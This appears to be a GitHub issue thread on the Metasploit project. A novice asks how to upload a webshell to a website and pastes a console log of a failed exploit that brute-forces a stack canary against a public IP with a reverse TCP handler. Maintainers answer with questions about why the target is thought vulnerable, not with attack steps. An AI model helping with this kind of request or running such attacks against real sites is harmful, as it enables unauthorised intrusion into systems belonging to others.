How do i upload a shell on a website using metasploit. exploits keep failing #19804
Comments
The
Ensure your network is configured correctly to allow reverse connections from the target to your host |
|
thank you for this feedback nginx modues are limited, how can i get better nginx modules? |
thank you for this feedback nginx modues are limited, how can i get better nginx modules? |
|
First, we have an issue template for when you submit an issue. I'd encourage you in the future to use it to provide us with additional information up front instead of us needing to ask a bunch of questions. I'm going to take a step back. Why do you think this module will work against this target? Did openvas, nessus, banner checking, or (if it has one) the check method say the target was vulnerable? Typically web servers don't have many vulnerabilities, but the web pages themselves do. So I'd encourage you to:
|
metasploit [] Started reverse TCP handler on 10.0.2.15:4444
[] 81.70.92.51:80 - Searching for stack canary
[] 81.70.92.51:80 - Assuming byte 0 0x00
[] 81.70.92.51:80 - Brute forcing byte 1
[+] 81.70.92.51:80 - Byte 1 found: 0x07
[] 81.70.92.51:80 - Brute forcing byte 2
[+] 81.70.92.51:80 - Byte 2 found: 0x01
[] 81.70.92.51:80 - Brute forcing byte 3
[+] 81.70.92.51:80 - Byte 3 found: 0x00
[+] 81.70.92.51:80 - Canary found: 0x00010700
[*] Exploit completed, but no session was created.
Any ideas how i can solve this?
just started ethical hacking and need to exploit a site vulnerability, upload a shell with file upload and download permissions and get a webshell for my project. and i am stuck here.
Pointers on how to go about this project would be much appreciated
The text was updated successfully, but these errors were encountered: